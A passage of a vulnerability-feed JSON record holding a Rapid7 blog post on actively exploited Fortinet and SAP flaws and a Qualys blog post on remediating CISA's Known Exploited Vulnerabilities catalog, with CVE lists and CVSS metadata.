_**\n", "cvss3": {}, "published": "2021-04-06T18:47:57", "type": "threatpost", "title": "SAP Bugs Under Active Cyberattack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-5326", "CVE-2016-3976", "CVE-2016-9563", "CVE-2018-2380", "CVE-2020-6207", "CVE-2020-6287"], "modified": "2021-04-06T18:47:57", "id": "THREATPOST:4CFA3A7AC21D83FC03B1B74B2DA261BD", "href": "https://threatpost.com/sap-bugs-cyberattack-compromise/165265/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-04-08T18:54:35", "description": "\n\n_The following blog was co-authored by Caitlin Condon and [Bob Rudis](<https://blog.rapid7.com/author/bob-rudis>), also known (in his own words) as \u201csome caveman from Maine.\u201d_\n\nLast week, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the FBI [published a joint alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/02/fbi-cisa-joint-advisory-exploitation-fortinet-fortios>) to warn users that APT threat actors were likely exploiting unpatched Fortinet FortiOS devices to gain initial access to government, commercial, technology, and other organizations\u2019 networks. The alert highlighted three FortiOS vulnerabilities, all of which were previously known, and at least one of which (CVE-2018-13379) has been broadly exploited for more than 18 months. This week, CISA [published an additional alert](<https://us-cert.cisa.gov/ncas/current-activity/2021/04/06/malicious-cyber-activity-targeting-critical-sap-applications>) amplifying a threat report from security firm Onapsis, which describes [ongoing attacks against SAP applications](<https://onapsis.com/active-cyberattacks-mission-critical-sap-applications>).\n\nRapid7 has previously analyzed a number of the highest-severity vulnerabilities enumerated in this latest set of alerts. 
The CVEs included in these reports have been detailed below, along with recommendations for organizations seeking to defend themselves against ongoing exploitation. Notably, none of these vulnerabilities are new\u2014many of them are a year or more old, which underscores the need for a regular patch cycle, as well as a defined patch cycle exception process.\n\n## FortiOS vulnerabilities\n\nFortinet devices are what we call **network pivots**\u2014that is, the position they occupy in organizations\u2019 networks gives external attackers the ability to access internal networks if exploited successfully, which in turn allows for a range of secondary attacks and other nefarious activities. If at all possible, defenders should strongly consider implementing a \u201czero-day\u201d patch cycle for internet-exposed and other network pivot products, including (but not only) Fortinet and other VPNs. InsightVM and Nexpose customers can assess their exposure to all three FortiOS CVEs below with vulnerability checks.\n\n * CVE-2018-13379 is a pre-authentication information disclosure vulnerability that arises from a path traversal flaw in the web portal component of FortiOS SSL VPNs. The vulnerability allows external attackers to download FortiOS system files through specially crafted HTTP resource requests and has been [exploited in the wild since 2019](<https://us-cert.cisa.gov/ncas/current-activity/2019/10/04/vulnerabilities-exploited-multiple-vpn-applications>). 
Read our [full analysis of CVE-2018-13379 and its history here](<https://attackerkb.com/topics/VEc81wfDS7/cve-2018-13379-path-traversal-in-fortinet-fortios?referrer=blog#rapid7-analysis>).\n * [CVE-2019-5591](<https://attackerkb.com/topics/sWpteHiN5z/cve-2019-5591?referrer=blog>) is a default configuration vulnerability in FortiOS that allows an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.\n * [CVE-2020-12812](<https://attackerkb.com/topics/8qnr47UsVL/cve-2020-12812?referrer=blog>) is an improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below that gives a user the ability to log in successfully without being prompted for the second factor of authentication (FortiToken) if that user changes the case of their username.\n\nSince the beginning of March, Rapid7 Labs' Heisenberg Honeypot fleet has seen nearly 60 IP addresses attempting common, known single `GET` request exploits against Fortinet devices (we\u2019ve grouped the IP addresses up to the hosting provider/ISP level):\n\n\n\nUnfortunately, our fleet does not emulate Fortinet devices. 
Since these devices are fairly easy to distinguish on the internet (nearly 1 million of them in the image, below)\u2014due to the common, vendor SSL certificate they use\u2014it is surprising to see opportunistic exploit attempts versus just inventory/discovery scans.\n\nOver 1 million Fortinet devices discovered by the latest Project Sonar scans (geolocated with MaxMind)\n\nThat last sentence should help organizations underscore why CISA and the FBI raised the Fortinet exploitation campaign to the level of a joint alert: Attackers can easily identify legitimate Fortinet endpoints on the internet, and it takes virtually no time from discovery to exploit if a target system is not patched and configured properly.\n\nOn April 3, 2021, Fortinet published [a post on patch and vulnerability management](<https://www.fortinet.com/blog/psirt-blogs/patch-vulnerability-management>) where they outlined the new alignment of their emergency response and patch release practices to ISO standards and further emphasized the need to keep internet-exposed Fortinet devices patched. They have a special knowledge base article on [how to stay notified about Fortinet patch releases](<https://kb.fortinet.com/kb/microsites/search.do?cmd=displayKC&docType=kc&externalId=FD50697&sliceId=1&docTypeID=DT_KCARTICLE_1_1&dialogID=184200521&stateId=1%200%20184202090%27>) and provide multiple ways for organizations to stay current on Fortinet security updates. 
\n\nAs Fortinet notes in that post, these weaknesses have had patches available for quite some time, so if you\u2019re just getting around to fixing them, you may need to dedicate some further cycles to some forensic activity, as it is very likely one or more attackers have already taken advantage of these vulnerabilities.\n\nTo learn more about other vulnerabilities that functioned as network pivots for attackers, read [Rapid7\u2019s 2020 Vulnerability Intelligence Report](<https://www.rapid7.com/research/report/vulnerability-intelligence-report/>).\n\n## Actively exploited SAP vulnerabilities\n\nThe two most recent SAP vulnerabilities detailed in Onapsis\u2019 threat report are CVE-2020-6287, a CVSS-10 vulnerability in the SAP NetWeaver Application Server (AS) Java component LM Configuration Wizard that has been actively exploited in the wild since July 2020, and SAP Solution Manager CVE-2020-6207. Both of these vulnerabilities allow broad compromise of SAP applications and environments.\n\n * CVE-2020-6287 is present by default in SAP applications running on top of SAP NetWeaver AS Java 7.3 and any newer versions (up to SAP NetWeaver 7.5). It allows remote, unauthenticated attackers to exploit and fully compromise vulnerable SAP installations. Exploitation of CVE-2020-6287 through the HTTP interface allows for modification or extraction of highly sensitive information and disruption of critical business processes. For a list of affected applications and additional guidance, read Rapid7\u2019s [full analysis here](<https://attackerkb.com/topics/JubO1RiVBP/cve-2020-6287-critical-vulnerability-in-sap-netweaver-application-server-as-java?referrer=blog#rapid7-analysis>).\n * CVE-2020-6207 arises from a missing authentication check in version 7.2 of SAP\u2019s Solution Manager product, allowing attackers to completely compromise all SMDAgents connected to the Solution Manager. 
\nSAP customers should pay close attention to their access logs and monitor for unauthorized user account creation; they should also ensure that web services in general do not run using privileged accounts. InsightVM and Nexpose customers can assess their risk to CVE-2020-6287 with a remote vulnerability check. A check for CVE-2020-6207 is currently under development.\n\nOther SAP vulnerabilities noted as being exploited in the wild include:\n\n * CVE-2018-2380 affects SAP CRM versions 7.01, 7.02, 7.30, 7.31, 7.33, and 7.54. The vulnerability allows an attacker to exploit insufficient validation of path information provided by users, letting characters representing \"traverse to parent directory\" pass through to the file APIs.\n * CVE-2016-9563 is a vulnerability in SAP NetWeaver Application Server (AS) Java 7.5 that allows remote authenticated users to conduct XML External Entity (XXE) attacks via the sap.com~tc~bpem~him~uwlconn~provider~web/bpemuwlconn URI.\n * CVE-2016-3976 is a directory traversal vulnerability in SAP NetWeaver AS Java 7.1 through 7.5 that allows remote attackers to read arbitrary files via a ..\\ (dot dot backslash) in the fileName parameter to `CrashFileDownloadServlet`.\n * CVE-2010-5326 is a CVSS-10 vulnerability in the `Invoker` Servlet on SAP NetWeaver Application Server Java platforms that arises from a lack of authentication and allows remote attackers to execute arbitrary code via an HTTP or HTTPS request. It was used in attacks from 2013 to 2016.\nAttackers have used these vulnerabilities to establish persistence, escalate privileges, and evade detection. It is also possible that threat actors may build exploit chains that extend access beyond SAP applications to underlying operating systems. Further information and recommendations are [available from Onapsis here](<https://www.onapsis.com/active-cyberattacks-mission-critical-sap-applications>). 
\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-04-08T17:18:07", "type": "rapid7blog", "title": "Attackers Targeting Fortinet Devices and SAP Applications", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2010-5326", "CVE-2016-3976", "CVE-2016-9563", "CVE-2018-13379", "CVE-2018-2380", "CVE-2019-5591", "CVE-2020-12812", "CVE-2020-6207", "CVE-2020-6287"], "modified": "2021-04-08T17:18:07", "id": "RAPID7BLOG:5109AC30126DB59333F13ED32F7F4713", "href": "https://blog.rapid7.com/2021/04/08/attackers-targeting-fortinet-devices-and-sap-applications/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. 
It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. 
The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022), we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:\"true\"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. 
With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. 
Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-
15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these 
vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}